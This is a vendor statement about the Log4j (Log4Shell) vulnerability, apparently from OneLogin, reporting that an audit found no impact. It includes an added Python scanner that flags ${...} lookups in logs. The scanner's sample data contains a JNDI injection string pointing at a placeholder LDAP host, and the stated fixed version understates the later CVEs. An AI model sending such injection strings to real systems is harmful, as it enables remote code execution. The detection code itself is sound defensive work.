A few days ago, a critical flaw was found in the Apache Log4j logging library (version 2.0.1 through to, but not including, version 2.15.0). The associated vulnerabilities (CVE-2021-44228, CVE-2021-45105, CVE-2021-45046, CVE-2021-44832) allow attackers who can control log messages or log message parameters to execute arbitrary code loaded from LDAP servers when the message lookup substitution feature is enabled.
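Because the flaw is triggered by lookup substitution on attacker-controlled text, one defensive check is to scan logs for `${...}` lookup expressions in user-supplied fields. The following is an added example, not code from the original statement or from OneLogin; the access-log format and the sample lines are constructed, and the hostname `example.invalid` is a placeholder.

```python
# Constructed sample log lines (not from the page): a web access log whose
# last field is the client-supplied User-Agent, which an application might
# pass into a Log4j log message.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2021:03:12:01 +0000] "GET / HTTP/1.1" 200 512 "Mozilla/5.0"
10.0.0.9 - - [10/Dec/2021:03:12:07 +0000] "GET /login HTTP/1.1" 200 88 "${jndi:ldap://example.invalid/a}"
10.0.0.7 - - [10/Dec/2021:03:12:09 +0000] "GET /api HTTP/1.1" 200 17 "${env:HOME}"
"""


def extract_lookups(text: str) -> list[str]:
    """Return every ${...} lookup expression in text, outermost first.

    Braces are matched so that a nested lookup comes back as one whole
    expression; an unterminated "${" ends the scan (nothing to substitute).
    """
    found = []
    i = 0
    while i < len(text):
        if not text.startswith("${", i):
            i += 1
            continue
        depth, j = 0, i
        while j < len(text):
            if text.startswith("${", j):
                depth += 1
                j += 2
                continue
            if text[j] == "}":
                depth -= 1
                if depth == 0:
                    found.append(text[i:j + 1])
                    break
            j += 1
        else:
            break  # ran off the end without closing the lookup
        i = j + 1
    return found


def classify(lookup: str) -> str:
    """'jndi' for a JNDI lookup (the remote-code-loading case), else 'other'."""
    inner = lookup[2:-1].strip().lower()
    return "jndi" if inner.startswith("jndi:") else "other"


def scan_log(log: str) -> list[tuple[int, str, str]]:
    """Yield (line number, class, expression) for every lookup in the log."""
    hits = []
    for n, line in enumerate(log.splitlines(), 1):
        for lookup in extract_lookups(line):
            hits.append((n, classify(lookup), lookup))
    return hits
```

Any hit, not only the `jndi` class, indicates that untrusted input reached a field where lookups would be substituted, so the field should be sanitised or the application updated to a fixed Log4j release.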
We understand that our customers might be concerned about whether our systems are vulnerable to the Log4j flaw, and we wanted to share the following statement directly from our Engineering and Security teams.
OneLogin is aware of the Log4j flaw (also now known as “Log4Shell”), a zero-day vulnerability (CVE-2021-44228) that first came to light on December 9, 2021. We have performed an audit and security review of the relevant OneLogin technologies and are not aware of any impact at this time. OneLogin will continue to monitor the situation and assess the impact of developments that come to light.
As always, we value Security First, and we are constantly striving to ensure that our systems and the data you entrust to us are protected.